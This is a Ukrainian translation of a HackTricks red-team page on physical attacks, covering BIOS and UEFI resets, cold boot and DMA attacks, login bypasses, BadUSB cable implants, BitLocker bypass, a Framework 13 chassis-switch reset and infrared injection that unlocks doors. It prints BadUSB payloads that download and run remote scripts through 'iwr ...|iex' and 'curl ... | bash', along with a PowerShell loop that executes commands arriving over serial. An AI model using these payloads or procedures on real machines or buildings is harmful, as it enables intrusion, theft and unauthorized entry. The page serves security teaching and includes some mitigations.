Фізичні атаки

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Відновлення пароля BIOS і безпека системи

Скидання BIOS можна виконати кількома способами. Більшість материнських плат містять батарею, яку при видаленні приблизно на 30 хвилин скидає налаштування BIOS, включно з паролем. Альтернативно, джампер на материнській платі можна перемкнути, з’єднавши певні виводи, щоб скинути ці налаштування.

У випадках, коли апаратні втручання неможливі або не практичні, допоможуть програмні інструменти. Запуск системи з Live CD/USB з дистрибутивами на кшталт Kali Linux дає доступ до інструментів, таких як killCmos та CmosPWD, які можуть допомогти у відновленні пароля BIOS.

Якщо пароль BIOS невідомий, його неправильне введення три рази зазвичай призводить до появи коду помилки. Цей код можна використати на вебсайтах на кшталт https://bios-pw.org, щоб потенційно отримати придатний пароль.

Безпека UEFI

Для сучасних систем, що використовують UEFI замість традиційного BIOS, можна використовувати інструмент chipsec для аналізу й модифікації налаштувань UEFI, включаючи відключення Secure Boot. Це можна зробити за допомогою наступної команди:

python chipsec_main.py -module exploits.secure.boot.pk

Аналіз RAM та Cold Boot Attacks

RAM зберігає дані короткий час після відключення живлення, зазвичай 1–2 хвилини. Цю персистентність можна продовжити до 10 хвилин, застосувавши холодні речовини, такі як рідкий азот. Протягом цього подовженого періоду можна створити memory dump за допомогою інструментів, таких як dd.exe і volatility, для аналізу.

Direct Memory Access (DMA) Attacks

INCEPTION — інструмент, призначений для physical memory manipulation через DMA, сумісний з інтерфейсами, такими як FireWire та Thunderbolt. Він дозволяє обходити процедури входу, патчачи пам’ять так, щоб приймати будь-який пароль. Однак він неефективний проти систем Windows 10.

Live CD/USB для доступу до системи

Заміна системних бінарників, таких як sethc.exe або Utilman.exe, копією cmd.exe може надати командний рядок із системними привілеями. Інструменти на кшталт chntpw можна використовувати для редагування файлу SAM інсталяції Windows, що дозволяє змінювати паролі.

Kon-Boot — інструмент, який полегшує вхід у Windows без знання пароля, тимчасово модифікуючи Windows kernel або UEFI. Більше інформації можна знайти на https://www.raymond.cc.

Робота з функціями безпеки Windows

Комбінації для завантаження та відновлення

  • Supr: доступ до налаштувань BIOS.
  • F8: увійти в режим відновлення.
  • Натискання Shift після банера Windows може обійти autologon.

BAD USB Devices

Пристрої на кшталт Rubber Ducky та Teensyduino служать платформами для створення bad USB пристроїв, здатних виконувати заздалегідь визначені payload при підключенні до цільового комп’ютера.

Volume Shadow Copy

Привілеї адміністратора дозволяють створювати копії конфіденційних файлів, включно з файлом SAM, через PowerShell.

BadUSB / HID Implant Techniques

Wi‑Fi керовані імпланти в кабелях

  • ESP32-S3 based implants such as Evil Crow Cable Wind ховаються всередині USB-A→USB-C або USB-C↔USB-C кабелів, представляються виключно як USB keyboard і виставляють свій C2 стек по Wi‑Fi. Оператору достатньо живити кабель від хоста жертви, створити точку доступу з ім’ям Evil Crow Cable Wind і паролем 123456789 та перейти в браузері на http://cable-wind.local/ (або на його DHCP-адресу), щоб дістатися вбудованого HTTP-інтерфейсу.
  • Браузерний UI надає вкладки Payload Editor, Upload Payload, List Payloads, AutoExec, Remote Shell і Config. Збережені payload-и маркуються під ОС, раскладки клавіатури перемикаються на льоту, а VID/PID рядки можна змінювати, щоб імітувати відомі периферійні пристрої.
  • Оскільки C2 знаходиться всередині кабелю, телефон може підготувати payload-и, запустити виконання та керувати Wi‑Fi обліковими даними без доступу до хост-ОС — ідеально для фізичних вторгнень з коротким часом перебування.

OS-aware AutoExec payloads

  • Правила AutoExec прив’язують один або кілька payload-ів для виконання негайно після USB enumeration. Імплант виконує легке OS fingerprinting і обирає відповідний скрипт.
  • Приклад роботи:
  • Windows: GUI rpowershell.exeSTRING powershell -nop -w hidden -c "iwr http://10.0.0.1/drop.ps1|iex"ENTER.
  • macOS/Linux: COMMAND SPACE (Spotlight) або CTRL ALT T (terminal) → STRING curl -fsSL http://10.0.0.1/init.sh | bashENTER.
  • Оскільки виконання відбувається без нагляду, просте підміщення зарядного кабелю може забезпечити початковий доступ «plug-and-pwn» у контексті залогіненого користувача.

HID-bootstrapped remote shell over Wi‑Fi TCP

  1. Keystroke bootstrap: Збережений payload відкриває консоль і вставляє цикл, який виконує все, що надходить на новий USB serial device. Мінімальний Windows варіант є:
$port=New-Object System.IO.Ports.SerialPort 'COM6',115200,'None',8,'One'
$port.Open(); while($true){$cmd=$port.ReadLine(); if($cmd){Invoke-Expression $cmd}}
  1. Cable bridge: Імплант утримує відкритим USB CDC channel, поки його ESP32-S3 запускає TCP client (Python script, Android APK, or desktop executable), що встановлює зворотне з’єднання з оператором. Будь-які bytes, введені в TCP session, пересилаються в наведений вище serial loop, забезпечуючи remote command execution навіть на air-gapped hosts. Вивід обмежений, тому оператори зазвичай виконують blind commands (створення акаунтів, підготовка додаткових інструментів тощо).

HTTP OTA поверхня оновлення

  • Той самий веб-стек зазвичай відкриває неавторизовані оновлення прошивки. Evil Crow Cable Wind слухає на /update і прошиває будь-який завантажений бінарний файл:
curl -F "file=@firmware.ino.bin" http://cable-wind.local/update
  • Полігонні оператори можуть hot-swap функції (наприклад, flash USB Army Knife firmware) під час виконання операції, не розкриваючи кабелю, що дозволяє implant переключатися на нові можливості, залишаючись підключеним до цільового хоста.

Обхід шифрування BitLocker

Шифрування BitLocker потенційно можна обійти, якщо пароль відновлення знайдено у дампі пам’яті (MEMORY.DMP). Для цього можна використовувати інструменти на кшталт Elcomsoft Forensic Disk Decryptor або Passware Kit Forensic.

Social Engineering для додавання ключа відновлення

Новий ключ відновлення BitLocker можна додати через Social Engineering, переконавши користувача виконати команду, яка додає новий ключ відновлення, що складається з нулів, тим самим спрощуючи процес дешифрування.

Використання Chassis Intrusion / Maintenance Switches для скидання BIOS до заводських налаштувань

Багато сучасних ноутбуків і компактних настільних ПК мають chassis-intrusion switch, яку моніторить Embedded Controller (EC) та прошивка BIOS/UEFI. Хоча основна мета перемикача — піднімати тривогу при відкритті корпусу, виробники іноді реалізують undocumented recovery shortcut, що спрацьовує при переключенні перемикача за певним шаблоном.

Як працює атака

  1. Перемикач підключений до GPIO interrupt на EC.
  2. Прошивка на EC відстежує часові інтервали та кількість натискань.
  3. Коли розпізнається жорстко закодований шаблон, EC викликає рутину mainboard-reset, яка видаляє вміст системного NVRAM/CMOS.
  4. Після наступного завантаження BIOS завантажує значення за замовчуванням – пароль супервізора, Secure Boot keys та всі користувацькі налаштування очищуються.

Після того як Secure Boot вимкнено та пароль прошивки зник, атакуючий може просто завантажити будь-який зовнішній образ ОС і отримати необмежений доступ до внутрішніх дисків.

Реальний приклад – Framework 13 Laptop

Комбінація відновлення для Framework 13 (11th/12th/13th-gen) така:

Press intrusion switch  →  hold 2 s
Release                 →  wait 2 s
(repeat the press/release cycle 10× while the machine is powered)

Після десятого циклу EC встановлює прапорець, який наказує BIOS очистити NVRAM при наступному перезавантаженні. Вся процедура займає ~40 s і вимагає лише викрутки.

Загальна процедура експлуатації

  1. Увімкніть або відновіть з режиму сну цільовий пристрій, щоб EC працював.
  2. Зніміть нижню кришку, щоб відкрити перемикач вторгнення/обслуговування.
  3. Відтворіть специфічний для постачальника шаблон переключення (звіртеся з документацією, форумами або виконайте реверс-інжиніринг прошивки EC).
  4. Зберіть пристрій і перезавантажте — захист прошивки має бути відключений.
  5. Завантажте live USB (e.g. Kali Linux) і виконайте звичайні post-exploitation дії (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).

Виявлення та пом’якшення

  • Реєструйте події chassis-intrusion в консолі керування ОС та корелюйте їх з несподіваними скиданнями BIOS.
  • Застосовуйте пломби, що свідчать про втручання, на гвинти/кришки для виявлення відкриття.
  • Тримайте пристрої в фізично контрольованих зонах; вважайте, що фізичний доступ означає повну компрометацію.
  • Де доступно, вимкніть у постачальника функцію «maintenance switch reset» або вимагайте додаткову криптографічну авторизацію для скидань NVRAM.

Прихована IR-ін’єкція проти сенсорів безконтактного виходу

Характеристики сенсорів

  • Звичайні сенсори “wave-to-exit” спарюють near-IR LED випромінювач з модулем-приймачем у стилі TV-remote, який подає логічну одиницю лише після того, як побачив кілька імпульсів (~4–10) правильної несучої (≈30 kHz).
  • Пластиковий кожух блокує прямий огляд випромінювача та приймача одне одного, тому контролер припускає, що будь-яка підтверджена несуча прийшла з близького відбиття і керує реле, яке відмикає дверний засув.
  • Коли контролер вважає, що ціль присутня, він часто змінює огинаючу вихідної модуляції, але приймач продовжує приймати будь-який імпульс, що відповідає відфільтрованій несучій.

Послідовність дій атаки

  1. Зафіксуйте профіль випромінювання – підключіть логічний аналізатор до контактів контролера, щоб записати форми сигналів до виявлення і після нього, які керують внутрішнім IR LED.
  2. Повторіть лише форму сигналу “post-detection” – зніміть/ігноруйте штатний випромінювач і керуйте зовнішнім IR LED із вже згенерованим шаблоном з самого початку. Оскільки приймач піклується лише про кількість/частоту імпульсів, він сприймає підроблену несучу як справжнє відбиття і активує лінію реле.
  3. Керування передачею – передавайте несучу настроєними серіями (наприклад, десятки мілісекунд увімкнено, подібно вимкнено), щоб забезпечити мінімальну кількість імпульсів без насичення AGC приймача або логіки обробки перешкод. Безперервне випромінювання швидко знечутливлює сенсор і припиняє спрацьовування реле.

Дальнобійна ін’єкція через відбиття

  • Заміняючи лабораторний LED на високопотужний IR-діод, драйвер MOSFET та фокусуючу оптику, можна надійно спрацьовувати з відстані ~6 m.
  • Атакуючому не потрібна пряма видимість апертури приймача; націлювання променя на внутрішні стіни, полиці або дверні рами, які видно через скло, дозволяє відбитій енергії потрапити у поле зору ~30° і імітує мах руки на близькій відстані.
  • Оскільки приймачі очікують лише слабкі відбиття, значно сильніший зовнішній промінь може відбиватись від кількох поверхонь і все одно залишатися вище порогу виявлення.

Озброєний атакувальний ліхтар

  • Вбудування драйвера в комерційний ліхтар ховає інструмент на виду. Замініть видимий LED на високопотужний IR LED, підібраний під діапазон приймача, додайте ATtiny412 (або аналогічний) для генерації ≈30 kHz імпульсів і використайте MOSFET для стікання струму через LED.
  • Телескопічна зум-лінза звужує промінь для дальності/точності, тоді як вібраційний мотор під контролем MCU дає тактильне підтвердження активності модуляції без випромінювання видимого світла.
  • Перебір декількох збережених шаблонів модуляції (трохи різні частоти несучої та огинаючі) підвищує сумісність між сенсорами різних брендів, дозволяючи оператору сканувати відбиваючі поверхні, поки реле не клацне і двері не відчиняться.

References

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks